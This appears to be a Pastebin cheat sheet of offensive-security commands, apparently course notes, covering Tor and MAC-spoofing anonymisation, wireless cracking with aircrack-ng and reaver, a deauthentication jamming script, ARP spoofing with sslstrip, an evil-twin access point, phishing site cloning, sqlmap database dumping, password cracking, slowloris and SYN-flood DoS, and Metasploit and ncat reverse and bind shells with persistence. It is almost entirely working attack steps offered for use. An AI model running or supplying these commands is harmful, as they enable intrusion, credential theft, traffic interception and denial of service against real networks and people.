Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Sites:
- nmap.org
- exploit-db.com
- TOR
- apt-get install tor -y
- adduser anon
- nano /etc/proxychains.conf
- USE SOCKS5
- uncomment dynamic_chain
- get root (su)
- add "socks5 127.0.0.1 9050" to end of the file
- service tor status
- service tor start
- proxychains firefox www.duckduckgo.com
- check dns leak
- proxychains nmap
- VPN
- cat /etc/resolv.conf
- nano /etc/dhcp/dhclient.conf
- change "#prepend domain-name-servers 127.0.0.1;"
- to OpenDNS addresses seperated by a comma
- service network-manager restart
- cat /etc/resolv.conf
- disable webart
- about:config in iceweasel
- change media.peerconnection.enabled to false and restart
- www.vpnbook.com (download software and get username and password)
- unzip VPNBook*.zip
- openvpn vpnbook*.ovpn
- www.dnsleaktest.com
- Macchanger
- macchanger -s eth0
- macchanger -r eth0
- macchanger -p eth0
- MAC_Change.sh (chmod +x)
- [
- #!/bin/bash
- ifconfig eth0 down
- sleep 2
- macchanger -r eth0
- sleep 2
- ifconfig eth0 up
- ]
- crontab -e (@reboot /path/MAC_Change.sh)
- Nmap (Zenmap)
- Test: http://scanme.nmap.org/
- nslookup [site or IP address]
- curl ipinfo.io/[IP address]
- nmap scanme.nmap.org -vv
- nmap -oG - 192.168.1.0-255 -p 22 -vv > /home/SCAN
- cat SCAN | grep Up | awk -F " " '{print $2}' > SCAN2
- nmap -iL SCAN2 -vv
- Reaver
- Donwload from Google Code and extract the gzip
- tar -zxvf file.tar.gz -C /path/to/directory
- {
- -z : Work on gzip compression automatically when reading archives.
- -x : Extract archives.
- -v : Produce verbose output i.e. display progress and extracted file list on screen.
- -f : Read the archive from the archive to the specified file. In this example, read backups.tar.gz archive.
- -t : List the files in the archive.
- }
- ./configure
- make
- make install
- Get Crunch Worldlist Generator from Soureforge and ungzip
- make
- make install
- Install USB wireless adapter with VirtualBox extension pack
- iwlist wlan0 scan | grep ESSID
- monitor.sh (chmod +x)
- [
- ifconfig wlan0 down
- iwconfig wlan0 mode monitor
- ifconfig wlan0 up
- macchanger wlan0 -r
- ]
- airmon-ng check wlan0
- kill NetworkMonitor then dhclient then others
- airodump-ng wlan0
- airodump-ng -c [channel #] -w SCAN_DUMP --bssid [MAC adress] wlan0
- For WEP
- {
- At same time: aireplay-ng -1 0 -a [MAC address] wlan0
- aireplay-ng -3 -b [MAC address] wlan0
- aircrack-ng SCAN_DUMP
- }
- At same time: aireplay-ng -0 0 -a [MAC address] wlan0
- Ctrl-C
- crunch [min-length] [max-length] -t [pattern] -f charset.lst | [aircrack-ng -w - SCAN_DUMP -e [BSSID]
- wash -i wlan0
- reaver -b [MAC address] -i wlan0 -c [channel #] -r [# trys]:[per secs] -vv
- Wireless DNS Jamming
- ./monitor.sh
- airmon-ng check wlan0 (kill processes)
- airodump-ng wlan0
- iwconfig wlan0 channel [#]
- aireplay-ng -0 0 -a [MAC address] wlan0
- jam.sh (chmod +x)
- [
- #!/bin/bash
- while true
- do
- aireplay-ng -0 5 -a [MAC address] wlan0 (optional "-c [MAC address]" for client)
- iwconfig wlan0 channel [#]
- ifconfig wlan0 down
- macchanger -r wlan0 | grep "New MAC"
- iwconfig wlan0 mode monitor
- ifconfig wlan0 up
- iwconfig wlan0 | grep Mode
- sleep 3
- echo Waiting!
- done
- ]
- Monitor with: airodump-ng -c [channel #] --bssid [MAC adress] wlan0
- SSL Strips
- echo 1 > /proc/sys/net/ip4/ip_forward
- iptables -t nat -A PREROUTING -p tcp --destination-port -j REDIRECT --to-port 8080
- iptables -t nat -L PREROUTING
- FIND TARGET (nmap 92.168.1.2-254 -vv)
- arpspoof -i wlan0 -t [gateway ip] -r [target ip]
- At same time: iptables -I INPUT 1 -p tcp --dport 8080 -j ACCEPT
- At same time: sslstrip -l 8080
- At same time: tail -f sslstrip.log
- SQUID
- apt-get install imagemagick ghostscript jp2a apache2 squid3
- Download SQUID scripts
- nano /etc/squid3/squid.conf
- Uncomment: acl localnet src 192.168.0.0/16 (or local network)
- Uncomment: http_access allow localnet
- Modify to: http_port 3128 transparent
- Add to bottom: url_rewrite_program [path]/[script.pl]
- service squid3 restart
- echo 1 > /proc/sys/net/ip4/ip_forward
- iptables -t nat -A PREROUTING -i wlan0 -p tcp --destination-port 80 -j REDIRECT --to-port 3128
- mkdir /var/www/tmp
- chmod 777 /var/www/tmp
- service httpd restart
- service apache2 restart
- arpspoof -i wlan0 -t [gateway ip] -r [target ip]
- Evil Twin
- Enter monitor mode and kill processes
- apt-get install bridge-utils wireshark
- airodump-ng wlan0
- airbase-ng -a [clone MAC address] --essid "Something" -c 6 wlan0
- aireplay-ng -0 0 -a [clone MAC address] wlan0
- brctl addbr evil
- brctl addif evil wlan0
- brctl addif evil at0
- ifconfig at0 0.0.0.0 up
- ifconfig evil up
- dhclient3 evil
- Listen to evil with wireshark
- Router Vulnerability
- Example:
- nmap -p80 --script http-tplin-dir-traversal.nse --script-args rfile=/tmp/ath0.ap_bss -d -n -Pn IPList
- DNS Post Authentication Exploit
- dnschef --fakeip=192.168.1.102 --fakedomains=randomName.com --interface=192.168.1.102
- setoolkit (1->2->3->2) site cloner
- nslookup [site you want to clone]
- cd /var/www
- tail -f harvester_file.txt
- SQL Injection
- Download DVWA (www.dvwa.co.uk)
- Copy the DVWA folder to clean /var/www/
- chmod -Rv 777 /var/www/DVWA*
- apt-cache search mysql | grep -i database | less
- apt-get install mysql-client mysql-server
- service mysql start
- service mysql restart
- mysql -h localhost -u root
- SET PASSWORD FOR root@localhost=PASSWORD('test');
- mysql -h localhost -u root -p
- nano /var/www/DWVA*/config.inc.php (change password setting)
- service mysql status
- service apache2 restart
- Go to localhost in browser (user: admin password: password)
- burpsuite (turn on intercept)
- Set manual proxy in brower to HTTP: 127.0.0.1 Port: 8080
- Get PHPSESSID
- sqlmap -u "[Full URL]" --cookie="security=low; PHPSESSID=[PHPSESSID]" --dbs
- sqlmap -u "[Full URL]" --cookie="security=low; PHPSESSID=[PHPSESSID]" -D dvwa --tables
- sqlmap -u "[Full URL]" --cookie="security=low; PHPSESSID=[PHPSESSID]" -T users --column
- sqlmap -u "[Full URL]" --cookie="security=low; PHPSESSID=[PHPSESSID]" -C first_name,last_name,user,password users --dump
- Use hash password cracking
- Cracking Hashes
- findmyhash MD5 -h [hash code]
- Change "ro" to "rw" and add "init=/bin/bash" to end of GRUB boot
- unshadow /etc/passwd /etc/shadow > pass
- john pass
- For Windows:
- Get pwdump7 from openwall.com
- pwdump7.exe > pass
- john pass
- john --show pass
- Hydra:
- Get name fields from HTML login form
- hyrda -l user -P passlist.txt [server IP] http-post-form ["rest of URL path:[username]=^USER^&[password]=^PASS^&Login=Login:[fail message]"] -V
- Can also use hydra-gtk GUI
- DoS Demonstration
- hping3 -i u100 -S -p 80 [IP address]
- nmap --script http-slowloris --max-paralellism 400 [IP address]-vv
- ./slowloris.pl -dns [IP address] -port 80 -num 500
- Reverse Shells
- service postgresql start
- service metasploit start
- msfupdate
- msfconsole
- In console: msfpayload windows/meterpreter/reverse_tcp LHOST=[IP address] x > /root/Desktop/CMD.exe
- use exploit/multi/handler
- set payload windows/meterpreter/reverse_tcp
- set LHOST [IP address]
- set LPORT [Port #]
- exploit
- help
- shell
- background
- sessions -l
- sessions -i [#]
- use post/windows/escalate
- use exploit/windows/local/ask
- show options
- set session [#]
- exploit
- getsystem
- run persistence -X
- ncat -v- -l -p port -e /bin/bash &
- Also: ncat -v -l -n -p [port] -e cmd.exe
- Other machine: ncat [IP address] [port]
- nmap localhost
- lsof -i :[port]
- kill processes using port
- ncat --ssl -l -p [port]
- Other machine: ncat -ssl [IP address] [port]
- Download php-reverse-shell
- Rename, change IP and upload
- Rename and forward in burpsuite
- nmap -v -l -p [port]
- etc...
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement